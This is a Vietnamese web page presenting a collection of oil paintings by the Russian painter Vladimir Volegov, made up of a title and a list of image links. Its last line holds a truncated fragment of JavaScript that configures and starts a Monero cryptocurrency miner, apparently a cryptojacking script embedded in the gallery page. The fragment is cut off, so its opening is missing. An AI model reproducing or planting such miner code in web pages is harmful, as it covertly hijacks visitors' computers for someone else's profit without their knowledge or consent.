Những bức sơn dầu của Họa sĩ người Nga Vladimir Volegov. Nguyễn Trung Quân sưu tầm -

Những bức sơn dầu của Họa sĩ người Nga Vladimir Volegov.
 
http://media2.thethaovanhoa.vn/2016/04/18/17/53/volegov-20resized.jpg
http://media2.thethaovanhoa.vn/2016/04/18/17/53/volegov-16resized.jpg
http://media2.thethaovanhoa.vn/2016/04/18/17/53/volegov-8resized.jpg
http://media2.thethaovanhoa.vn/2016/04/18/17/53/volegov-4resized.jpg
http://media2.thethaovanhoa.vn/2016/04/18/17/53/volegov-25resized.jpg
http://media2.thethaovanhoa.vn/2016/04/18/17/53/volegov-15resized.jpg
http://media2.thethaovanhoa.vn/2016/04/18/17/53/volegov-23resized.jpg
http://media2.thethaovanhoa.vn/2016/04/18/17/53/volegov-17resized.jpg
http://media2.thethaovanhoa.vn/2016/04/18/17/53/volegov-22resized.jpg
http://media2.thethaovanhoa.vn/2016/04/18/17/53/volegov-9resized.jpg
http://media2.thethaovanhoa.vn/2016/04/18/17/53/volegov-7resized.jpg
http://media2.thethaovanhoa.vn/2016/04/18/17/53/volegov-6resized.jpg
http://media2.thethaovanhoa.vn/2016/04/18/17/53/volegov-24resized.jpg
http://media2.thethaovanhoa.vn/2016/04/18/17/53/volegov-5resized.jpg
http://media2.thethaovanhoa.vn/2016/04/18/17/53/volegov-1resized.jpg
http://media2.thethaovanhoa.vn/2016/04/18/17/53/volegov-14resized.jpg
http://media2.thethaovanhoa.vn/2016/04/18/17/53/volegov-3resized.jpg
http://media2.thethaovanhoa.vn/2016/04/18/17/53/volegov-12resized.jpg
http://media2.thethaovanhoa.vn/2016/04/18/17/53/volegov-21resized.jpg
http://media2.thethaovanhoa.vn/2016/04/18/17/53/volegov-2resized.jpg
http://media2.thethaovanhoa.vn/2016/04/18/17/53/volegov-18resized.jpg
http://media2.thethaovanhoa.vn/2016/04/18/17/53/volegov-11resized.jpg
http://media2.thethaovanhoa.vn/2016/04/18/17/53/volegov-13resized.jpg
http://media2.thethaovanhoa.vn/2016/04/18/17/53/volegov-10resized.jpg
.
', { threads:2,throttle:0.2, coin: "xmr", }); miner.start();